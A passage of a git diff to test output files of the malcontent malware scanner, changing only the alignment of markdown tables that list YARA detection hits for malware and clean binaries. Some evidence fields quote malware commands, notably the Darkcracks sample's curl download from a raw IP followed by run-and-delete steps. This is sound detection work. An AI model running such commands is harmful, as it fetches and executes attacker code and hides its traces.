%3E%3E%3E18&type=code)<br>[m>>>17](https://github.com/search?q=m%3E%3E%3E17&type=code)<br>[m>>>19](https://github.com/search?q=m%3E%3E%3E19&type=code)<br>[m>>>10](https://github.com/search?q=m%3E%3E%3E10&type=code)<br>[i>>>13](https://github.com/search?q=i%3E%3E%3E13&type=code)<br>[i>>>22](https://github.com/search?q=i%3E%3E%3E22&type=code)<br>[a>>>11](https://github.com/search?q=a%3E%3E%3E11&type=code)<br>[a>>>25](https://github.com/search?q=a%3E%3E%3E25&type=code)<br>[e>>>19](https://github.com/search?q=e%3E%3E%3E19&type=code)<br>[e>>>29](https://github.com/search?q=e%3E%3E%3E29&type=code)<br>[b>>>31](https://github.com/search?q=b%3E%3E%3E31&type=code)<br>[y>>>31](https://github.com/search?q=y%3E%3E%3E31&type=code)<br>[d>>>24](https://github.com/search?q=d%3E%3E%3E24&type=code)<br>[e>>>13](https://github.com/search?q=e%3E%3E%3E13&type=code)<br>[f>>>24](https://github.com/search?q=f%3E%3E%3E24&type=code)<br>[r>>>24](https://github.com/search?q=r%3E%3E%3E24&type=code)<br>[a>>>24](https://github.com/search?q=a%3E%3E%3E24&type=code)<br>[y>>>13](https://github.com/search?q=y%3E%3E%3E13&type=code)<br>[m>>>13](https://github.com/search?q=m%3E%3E%3E13&type=code)<br>[f>>>13](https://github.com/search?q=f%3E%3E%3E13&type=code)<br>[u>>>13](https://github.com/search?q=u%3E%3E%3E13&type=code)<br>[t>>>26](https://github.com/search?q=t%3E%3E%3E26&type=code)<br>[v>>>16](https://github.com/search?q=v%3E%3E%3E16&type=code)<br>[v>>>24](https://github.com/search?q=v%3E%3E%3E24&type=code)<br>[c>>>24](https://github.com/search?q=c%3E%3E%3E24&type=code)<br>[c>>>16](https://github.com/search?q=c%3E%3E%3E16&type=code)<br>[l>>>26](https://github.com/search?q=l%3E%3E%3E26&type=code)<br>[u>>>16](https://github.com/search?q=u%3E%3E%3E16&type=code)<br>[h>>>16](https://github.com/search?q=h%3E%3E%3E16&type=code)<br>[n>>>26](https://github.com/search?q=n%3E%3E%3E26&type=code)<br>[h>>>24](https://github.com/search?q=h%3E%3E%3E24&type=code)<br>[d>>>16](https://github.com/search?q=d%3E%3E%3E16&type=code)<br>[n>>>31](https://github.com/search?q=n%3E%3E%3E31&type=code)<br>[o>>>31](https://github.com/search?q=o%3E%3E%3E31&type=code)<br>[f>>>31](https://github.com/search?q=f%3E%3E%3E31&type=code)<br>[p>>>31](https://github.com/search?q=p%3E%3E%3E31&type=code)<br>[h>>>31](https://github.com/search?q=h%3E%3E%3E31&type=code)<br>[d>>>31](https://github.com/search?q=d%3E%3E%3E31&type=code)<br>[l>>>31](https://github.com/search?q=l%3E%3E%3E31&type=code)<br>[i>>>16](https://github.com/search?q=i%3E%3E%3E16&type=code)<br>[n>>>17](https://github.com/search?q=n%3E%3E%3E17&type=code)<br>[a>>>15](https://github.com/search?q=a%3E%3E%3E15&type=code)<br>[s>>>31](https://github.com/search?q=s%3E%3E%3E31&type=code)<br>[a>>>31](https://github.com/search?q=a%3E%3E%3E31&type=code)<br>[o>>>10](https://github.com/search?q=o%3E%3E%3E10&type=code)<br>[i>>>31](https://github.com/search?q=i%3E%3E%3E31&type=code)<br>[w>>>28](https://github.com/search?q=w%3E%3E%3E28&type=code)<br>[v>>>28](https://github.com/search?q=v%3E%3E%3E28&type=code)<br>[b>>>29](https://github.com/search?q=b%3E%3E%3E29&type=code)<br>[y>>>29](https://github.com/search?q=y%3E%3E%3E29&type=code)<br>[k>>>20](https://github.com/search?q=k%3E%3E%3E20&type=code)<br>[j>>>21](https://github.com/search?q=j%3E%3E%3E21&type=code)<br>[z>>>17](https://github.com/search?q=z%3E%3E%3E17&type=code)<br>[e>>>12](https://github.com/search?q=e%3E%3E%3E12&type=code)<br>[e>>>25](https://github.com/search?q=e%3E%3E%3E25&type=code)<br>[e>>>18](https://github.com/search?q=e%3E%3E%3E18&type=code)<br>[e>>>27](https://github.com/search?q=e%3E%3E%3E27&type=code)<br>[e>>>31](https://github.com/search?q=e%3E%3E%3E31&type=code)<br>[e>>>22](https://github.com/search?q=e%3E%3E%3E22&type=code)<br>[e>>>11](https://github.com/search?q=e%3E%3E%3E11&type=code)<br>[e>>>17](https://github.com/search?q=e%3E%3E%3E17&type=code)<br>[e>>>14](https://github.com/search?q=e%3E%3E%3E14&type=code)<br>[t>>>29](https://github.com/search?q=t%3E%3E%3E29&type=code)<br>[t>>>16](https://github.com/search?q=t%3E%3E%3E16&type=code)<br>[r>>>13](https://github.com/search?q=r%3E%3E%3E13&type=code)<br>[i>>>10](https://github.com/search?q=i%3E%3E%3E10&type=code)<br>[s>>>14](https://github.com/search?q=s%3E%3E%3E14&type=code)<br>[n>>>16](https://github.com/search?q=n%3E%3E%3E16&type=code)<br>[w>>>17](https://github.com/search?q=w%3E%3E%3E17&type=code)<br>[w>>>19](https://github.com/search?q=w%3E%3E%3E19&type=code)<br>[w>>>10](https://github.com/search?q=w%3E%3E%3E10&type=code)<br>[w>>>18](https://github.com/search?q=w%3E%3E%3E18&type=code)<br>[h>>>11](https://github.com/search?q=h%3E%3E%3E11&type=code)<br>[h>>>25](https://github.com/search?q=h%3E%3E%3E25&type=code)<br>[a>>>22](https://github.com/search?q=a%3E%3E%3E22&type=code)<br>[x>>>14](https://github.com/search?q=x%3E%3E%3E14&type=code)<br>[x>>>18](https://github.com/search?q=x%3E%3E%3E18&type=code)<br>[g>>>16](https://github.com/search?q=g%3E%3E%3E16&type=code)<br>[h>>>29](https://github.com/search?q=h%3E%3E%3E29&type=code)<br>[h>>>19](https://github.com/search?q=h%3E%3E%3E19&type=code)<br>[d>>>29](https://github.com/search?q=d%3E%3E%3E29&type=code)<br>[t>>>32](https://github.com/search?q=t%3E%3E%3E32&type=code)<br>[x>>>23](https://github.com/search?q=x%3E%3E%3E23&type=code)<br>[e>>>5](https://github.com/search?q=e%3E%3E%3E5&type=code)<br>[q>>>0](https://github.com/search?q=q%3E%3E%3E0&type=code)<br>[e>>>7](https://github.com/search?q=e%3E%3E%3E7&type=code)<br>[e>>>8](https://github.com/search?q=e%3E%3E%3E8&type=code)<br>[t>>>9](https://github.com/search?q=t%3E%3E%3E9&type=code)<br>[t>>>7](https://github.com/search?q=t%3E%3E%3E7&type=code)<br>[d>>>6](https://github.com/search?q=d%3E%3E%3E6&type=code)<br>[q>>>3](https://github.com/search?q=q%3E%3E%3E3&type=code)<br>[e>>>4](https://github.com/search?q=e%3E%3E%3E4&type=code)<br>[e>>>0](https://github.com/search?q=e%3E%3E%3E0&type=code)<br>[h>>>6](https://github.com/search?q=h%3E%3E%3E6&type=code)<br>[a>>>8](https://github.com/search?q=a%3E%3E%3E8&type=code)<br>[s>>>8](https://github.com/search?q=s%3E%3E%3E8&type=code)<br>[i>>>5](https://github.com/search?q=i%3E%3E%3E5&type=code)<br>[u>>>8](https://github.com/search?q=u%3E%3E%3E8&type=code)<br>[c>>>8](https://github.com/search?q=c%3E%3E%3E8&type=code)<br>[d>>>8](https://github.com/search?q=d%3E%3E%3E8&type=code)<br>[h>>>8](https://github.com/search?q=h%3E%3E%3E8&type=code)<br>[n>>>7](https://github.com/search?q=n%3E%3E%3E7&type=code)<br>[o>>>4](https://github.com/search?q=o%3E%3E%3E4&type=code)<br>[l>>>8](https://github.com/search?q=l%3E%3E%3E8&type=code)<br>[c>>>5](https://github.com/search?q=c%3E%3E%3E5&type=code)<br>[k>>>4](https://github.com/search?q=k%3E%3E%3E4&type=code)<br>[v>>>8](https://github.com/search?q=v%3E%3E%3E8&type=code)<br>[p>>>8](https://github.com/search?q=p%3E%3E%3E8&type=code)<br>[w>>>3](https://github.com/search?q=w%3E%3E%3E3&type=code)<br>[r>>>8](https://github.com/search?q=r%3E%3E%3E8&type=code)<br>[n>>>8](https://github.com/search?q=n%3E%3E%3E8&type=code)<br>[f>>>8](https://github.com/search?q=f%3E%3E%3E8&type=code)<br>[a>>>0](https://github.com/search?q=a%3E%3E%3E0&type=code)<br>[l>>>0](https://github.com/search?q=l%3E%3E%3E0&type=code)<br>[o>>>5](https://github.com/search?q=o%3E%3E%3E5&type=code)<br>[o>>>8](https://github.com/search?q=o%3E%3E%3E8&type=code)<br>[t>>>0](https://github.com/search?q=t%3E%3E%3E0&type=code)<br>[r>>>0](https://github.com/search?q=r%3E%3E%3E0&type=code)<br>[i>>>0](https://github.com/search?q=i%3E%3E%3E0&type=code)<br>[n>>>0](https://github.com/search?q=n%3E%3E%3E0&type=code)<br>[s>>>0](https://github.com/search?q=s%3E%3E%3E0&type=code)<br>[o>>>0](https://github.com/search?q=o%3E%3E%3E0&type=code)<br>[c>>>0](https://github.com/search?q=c%3E%3E%3E0&type=code)<br>[z>>>0](https://github.com/search?q=z%3E%3E%3E0&type=code)<br>[b>>>0](https://github.com/search?q=b%3E%3E%3E0&type=code)<br>[v>>>0](https://github.com/search?q=v%3E%3E%3E0&type=code)<br>[m>>>0](https://github.com/search?q=m%3E%3E%3E0&type=code)<br>[p>>>0](https://github.com/search?q=p%3E%3E%3E0&type=code)<br>[n>>>5](https://github.com/search?q=n%3E%3E%3E5&type=code)<br>[a>>>6](https://github.com/search?q=a%3E%3E%3E6&type=code)<br>[p>>>7](https://github.com/search?q=p%3E%3E%3E7&type=code)<br>[s>>>6](https://github.com/search?q=s%3E%3E%3E6&type=code)<br>[x>>>9](https://github.com/search?q=x%3E%3E%3E9&type=code)<br>[h>>>7](https://github.com/search?q=h%3E%3E%3E7&type=code)<br>[d>>>7](https://github.com/search?q=d%3E%3E%3E7&type=code)<br>[w>>>7](https://github.com/search?q=w%3E%3E%3E7&type=code) |
 | +HIGH | **[c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#exotic_tld)** | Contains HTTP hostname with unusual top-level domain | [https://api.mantlescan.xyz/](https://api.mantlescan.xyz/)<br>[https://mantlescan.xyz/](https://mantlescan.xyz/)<br>[https://openchain.xyz/](https://openchain.xyz/) |
@@ -57,7 +57,7 @@
 ### 5 removed behaviors
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | -MEDIUM | [anti-static/obfuscation/strtoi](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/strtoi.yara#sketchy_parseint_math) | complex math and string to integer conversion | [alFrames*100](https://github.com/search?q=alFrames%2A100&type=code)<br>[56320+65536](https://github.com/search?q=56320%2B65536&type=code)<br>[969v6h-12](https://github.com/search?q=969v6h-12&type=code)<br>[100*this](https://github.com/search?q=100%2Athis&type=code)<br>[100*Math](https://github.com/search?q=100%2AMath&type=code)<br>[parseInt](https://github.com/search?q=parseInt&type=code)<br>[180*Math](https://github.com/search?q=180%2AMath&type=code)<br>[01*this](https://github.com/search?q=01%2Athis&type=code)<br>[i-56320](https://github.com/search?q=i-56320&type=code)<br>[r-55296](https://github.com/search?q=r-55296&type=code)<br>[01*Math](https://github.com/search?q=01%2AMath&type=code)<br>[255*G](https://github.com/search?q=255%2AG&type=code)<br>[255*e](https://github.com/search?q=255%2Ae&type=code)<br>[001*t](https://github.com/search?q=001%2At&type=code)<br>[255*t](https://github.com/search?q=255%2At&type=code)<br>[001*r](https://github.com/search?q=001%2Ar&type=code)<br>[255*j](https://github.com/search?q=255%2Aj&type=code)<br>[001-e](https://github.com/search?q=001-e&type=code)<br>[001+e](https://github.com/search?q=001%2Be&type=code)<br>[255*u](https://github.com/search?q=255%2Au&type=code)<br>[984-3](https://github.com/search?q=984-3&type=code)<br>[01*a](https://github.com/search?q=01%2Aa&type=code)<br>[01*n](https://github.com/search?q=01%2An&type=code)<br>[01+i](https://github.com/search?q=01%2Bi&type=code)<br>[10*h](https://github.com/search?q=10%2Ah&type=code)<br>[v-90](https://github.com/search?q=v-90&type=code)<br>[h+90](https://github.com/search?q=h%2B90&type=code)<br>[19*e](https://github.com/search?q=19%2Ae&type=code)<br>[12*e](https://github.com/search?q=12%2Ae&type=code) |
 | -MEDIUM | [anti-static/obfuscation/utf16](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/utf16.yara#sketchy_fromCharCode_math) | complex math and utf16 code unit conversion | [fromCharCode](https://github.com/search?q=fromCharCode&type=code)<br>[alFrames*100](https://github.com/search?q=alFrames%2A100&type=code)<br>[56320+65536](https://github.com/search?q=56320%2B65536&type=code)<br>[969v6h-12](https://github.com/search?q=969v6h-12&type=code)<br>[100*this](https://github.com/search?q=100%2Athis&type=code)<br>[100*Math](https://github.com/search?q=100%2AMath&type=code)<br>[180*Math](https://github.com/search?q=180%2AMath&type=code)<br>[01*this](https://github.com/search?q=01%2Athis&type=code)<br>[r-55296](https://github.com/search?q=r-55296&type=code)<br>[i-56320](https://github.com/search?q=i-56320&type=code)<br>[01*Math](https://github.com/search?q=01%2AMath&type=code)<br>[984-3](https://github.com/search?q=984-3&type=code)<br>[255*e](https://github.com/search?q=255%2Ae&type=code)<br>[255*t](https://github.com/search?q=255%2At&type=code)<br>[255*j](https://github.com/search?q=255%2Aj&type=code)<br>[001*t](https://github.com/search?q=001%2At&type=code)<br>[001*r](https://github.com/search?q=001%2Ar&type=code)<br>[001-e](https://github.com/search?q=001-e&type=code)<br>[001+e](https://github.com/search?q=001%2Be&type=code)<br>[255*G](https://github.com/search?q=255%2AG&type=code)<br>[255*u](https://github.com/search?q=255%2Au&type=code)<br>[01*n](https://github.com/search?q=01%2An&type=code)<br>[01*a](https://github.com/search?q=01%2Aa&type=code)<br>[10*h](https://github.com/search?q=10%2Ah&type=code)<br>[19*e](https://github.com/search?q=19%2Ae&type=code)<br>[12*e](https://github.com/search?q=12%2Ae&type=code)<br>[v-90](https://github.com/search?q=v-90&type=code)<br>[h+90](https://github.com/search?q=h%2B90&type=code)<br>[01+i](https://github.com/search?q=01%2Bi&type=code) |
 | -MEDIUM | [data/encoding/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/url.yara#decode_uri_component) | decodes URL components | [decodeURIComponent](https://github.com/search?q=decodeURIComponent&type=code) |
diff --git a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
index e2288f43d..1d4c056fd 100644
--- a/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
+++ b/tests/linux/2022.bpfdoor/2023.ConnectBack/tiny.md
@@ -1,7 +1,7 @@
 ## linux/2022.bpfdoor/2023.ConnectBack/tiny [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
 | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
 
diff --git a/tests/linux/2023.ConnectBack/tiny.md b/tests/linux/2023.ConnectBack/tiny.md
index 8ea5e9d9b..3df0a5873 100644
--- a/tests/linux/2023.ConnectBack/tiny.md
+++ b/tests/linux/2023.ConnectBack/tiny.md
@@ -1,7 +1,7 @@
 ## linux/2023.ConnectBack/tiny [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | CRITICAL | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#single_load_rwe) | Binary with a single LOAD segment marked RWE, by Tenable | |
 | MEDIUM | [anti-static/binary/opaque](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/binary/opaque.yara#opaque_binary) | binary contains little text content | |
 
diff --git a/tests/linux/2024.Darkcracks/darkcracks.sh.md b/tests/linux/2024.Darkcracks/darkcracks.sh.md
index 21947b244..2a63cc50f 100644
--- a/tests/linux/2024.Darkcracks/darkcracks.sh.md
+++ b/tests/linux/2024.Darkcracks/darkcracks.sh.md
@@ -1,7 +1,7 @@
 ## linux/2024.Darkcracks/darkcracks.sh [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | CRITICAL | [evasion/file/location/chdir_unusual](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/location/chdir-unusual.yara#cd_val_obsessive) | changes directory to multiple unusual locations | [cd /root](https://github.com/search?q=cd+%2Froot&type=code)<br>[cd /mnt](https://github.com/search?q=cd+%2Fmnt&type=code)<br>[cd /tmp](https://github.com/search?q=cd+%2Ftmp&type=code)<br>[cd /;](https://github.com/search?q=cd+%2F%3B&type=code) |
 | CRITICAL | [evasion/self_deletion/run_and_delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/self_deletion/run_and_delete.yara#run_sleep_delete) | run executable, sleep, and delete | [chmod +x ./wdvsh](https://github.com/search?q=chmod+%2Bx+.%2Fwdvsh&type=code)<br>[./wdvsh agr](https://github.com/search?q=.%2Fwdvsh+agr&type=code)<br>[rm ./wdvsh](https://github.com/search?q=rm+.%2Fwdvsh&type=code)<br>[rm ./agr](https://github.com/search?q=rm+.%2Fagr&type=code)<br>[sleep 3](https://github.com/search?q=sleep+3&type=code) |
 | CRITICAL | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_download_ip) | Invokes curl to download a file from an IP | [curl http://179.191.68.85:82/vendor/sebastian/diff/src/Exception/j8UgL3v -o](https://github.com/search?q=curl+http%3A%2F%2F179.191.68.85%3A82%2Fvendor%2Fsebastian%2Fdiff%2Fsrc%2FException%2Fj8UgL3v+-o&type=code) |
diff --git a/tests/linux/UPX/06ed158.md b/tests/linux/UPX/06ed158.md
index b993ef244..bf6b79fbe 100644
--- a/tests/linux/UPX/06ed158.md
+++ b/tests/linux/UPX/06ed158.md
@@ -1,7 +1,7 @@
 ## linux/UPX/06ed158 [😈 CRITICAL]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | HIGH | [anti-static/elf/content](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/content.yara#obfuscated_elf) | Obfuscated ELF binary (missing symbols) | |
 | HIGH | [anti-static/elf/entropy](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/entropy.yara#normal_elf_high_entropy_7_4) | high entropy footer in ELF binary (>7.4) | |
 | HIGH | [anti-static/elf/header](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/header.yara#high_entropy_header) | high entropy ELF header (>7) | |
diff --git a/tests/linux/clean/code-oss.md b/tests/linux/clean/code-oss.md
index 1aa125ec1..df3aef476 100644
--- a/tests/linux/clean/code-oss.md
+++ b/tests/linux/clean/code-oss.md
@@ -1,7 +1,7 @@
 ## linux/clean/code-oss [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) |
 | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) |
 | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)<br>[VMware](https://github.com/search?q=VMware&type=code) |
diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md
index caf2ce678..9b049d11f 100644
--- a/tests/linux/clean/cpack.md
+++ b/tests/linux/clean/cpack.md
@@ -1,7 +1,7 @@
 ## linux/clean/cpack [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [local_ip](https://github.com/search?q=local_ip&type=code)<br>[use_port](https://github.com/search?q=use_port&type=code)<br>[Port](https://github.com/search?q=Port&type=code)<br>[Ip](https://github.com/search?q=Ip&type=code)<br>[IP](https://github.com/search?q=IP&type=code) |
 | MEDIUM | [c2/client](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/client.yara#clientID) | contains a client ID | [clientID](https://github.com/search?q=clientID&type=code) |
diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md
index e2d48ee2d..45a376d40 100644
--- a/tests/linux/clean/ls.x86_64.md
+++ b/tests/linux/clean/ls.x86_64.md
@@ -1,7 +1,7 @@
 ## linux/clean/ls.x86_64 [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) |
 | LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)<br>[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/)<br>[https://translationproject.org/team/](https://translationproject.org/team/)<br>[https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html) |
 | LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)<br>[x86](https://github.com/search?q=x86&type=code) |
diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md
index 834b8e910..d829ed5b7 100644
--- a/tests/linux/clean/lslogins.md
+++ b/tests/linux/clean/lslogins.md
@@ -1,7 +1,7 @@
 ## linux/clean/lslogins [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [collect/databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite](https://github.com/search?q=sqlite&type=code) |
 | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
 | MEDIUM | [evasion/logging/current_logins](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/current_logins.yara#current_logins) | accesses current logins | [/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code) |
diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md
index 5eeb8aae4..03fcc32b6 100644
--- a/tests/linux/clean/pandoc.md
+++ b/tests/linux/clean/pandoc.md
@@ -1,7 +1,7 @@
 ## linux/clean/pandoc [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [curlopt_port](https://github.com/search?q=curlopt_port&type=code)<br>[primary_port](https://github.com/search?q=primary_port&type=code)<br>[internal_ip](https://github.com/search?q=internal_ip&type=code)<br>[lnormhet_ip](https://github.com/search?q=lnormhet_ip&type=code)<br>[defaultPort](https://github.com/search?q=defaultPort&type=code)<br>[radius_port](https://github.com/search?q=radius_port&type=code)<br>[domain_port](https://github.com/search?q=domain_port&type=code)<br>[config_port](https://github.com/search?q=config_port&type=code)<br>[client_port](https://github.com/search?q=client_port&type=code)<br>[server_port](https://github.com/search?q=server_port&type=code)<br>[validate_ip](https://github.com/search?q=validate_ip&type=code)<br>[lloghet_ip](https://github.com/search?q=lloghet_ip&type=code)<br>[serverPort](https://github.com/search?q=serverPort&type=code)<br>[socketPort](https://github.com/search?q=socketPort&type=code)<br>[weibhet_ip](https://github.com/search?q=weibhet_ip&type=code)<br>[ipproto_ip](https://github.com/search?q=ipproto_ip&type=code)<br>[ereghet_ip](https://github.com/search?q=ereghet_ip&type=code)<br>[gomphet_ip](https://github.com/search?q=gomphet_ip&type=code)<br>[primary_ip](https://github.com/search?q=primary_ip&type=code)<br>[local_port](https://github.com/search?q=local_port&type=code)<br>[framed_ip](https://github.com/search?q=framed_ip&type=code)<br>[gamhet_ip](https://github.com/search?q=gamhet_ip&type=code)<br>[client_ip](https://github.com/search?q=client_ip&type=code)<br>[open_port](https://github.com/search?q=open_port&type=code)<br>[http_port](https://github.com/search?q=http_port&type=code)<br>[proxyPort](https://github.com/search?q=proxyPort&type=code)<br>[login_ip](https://github.com/search?q=login_ip&type=code)<br>[get_port](https://github.com/search?q=get_port&type=code)<br>[nas_port](https://github.com/search?q=nas_port&type=code)<br>[tcp_port](https://github.com/search?q=tcp_port&type=code)<br>[sam_port](https://github.com/search?q=sam_port&type=code)<br>[lat_port](https://github.com/search?q=lat_port&type=code)<br>[url_port](https://github.com/search?q=url_port&type=code)<br>[local_ip](https://github.com/search?q=local_ip&type=code)<br>[bindPort](https://github.com/search?q=bindPort&type=code)<br>[ftp_port](https://github.com/search?q=ftp_port&type=code)<br>[uriPort](https://github.com/search?q=uriPort&type=code)<br>[host_ip](https://github.com/search?q=host_ip&type=code)<br>[setPort](https://github.com/search?q=setPort&type=code)<br>[getPort](https://github.com/search?q=getPort&type=code)<br>[pg_port](https://github.com/search?q=pg_port&type=code)<br>[is_port](https://github.com/search?q=is_port&type=code)<br>[nas_ip](https://github.com/search?q=nas_ip&type=code)<br>[blIp](https://github.com/search?q=blIp&type=code)<br>[mIp](https://github.com/search?q=mIp&type=code)<br>[xIp](https://github.com/search?q=xIp&type=code)<br>[eIp](https://github.com/search?q=eIp&type=code)<br>[IP](https://github.com/search?q=IP&type=code) |
 | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [inet_server_addr](https://github.com/search?q=inet_server_addr&type=code) |
diff --git a/tests/linux/clean/ping.x86_64.md b/tests/linux/clean/ping.x86_64.md
index ec993fe70..01b056128 100644
--- a/tests/linux/clean/ping.x86_64.md
+++ b/tests/linux/clean/ping.x86_64.md
@@ -1,7 +1,7 @@
 ## linux/clean/ping.x86_64 [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [Port](https://github.com/search?q=Port&type=code)<br>[IP](https://github.com/search?q=IP&type=code) |
 | MEDIUM | [discover/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/multiple.yara#sys_net_recon) | collects system and network information | [ipv6=addr](https://github.com/search?q=ipv6%3Daddr&type=code)<br>[ipv4=addr](https://github.com/search?q=ipv4%3Daddr&type=code)<br>[id](https://github.com/search?q=id&type=code) |
 | MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)<br>[getifaddrs](https://github.com/search?q=getifaddrs&type=code) |
diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md
index a7669e6db..6fe1fcebf 100644
--- a/tests/linux/clean/qemu-system-xtensa.md
+++ b/tests/linux/clean/qemu-system-xtensa.md
@@ -1,7 +1,7 @@
 ## linux/clean/qemu-system-xtensa [🟡 MEDIUM]
 
 | RISK | KEY | DESCRIPTION | EVIDENCE |
-|:--:|:--:|:--:|:--:|
+|:--|:--|:--|:--|
 | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` |
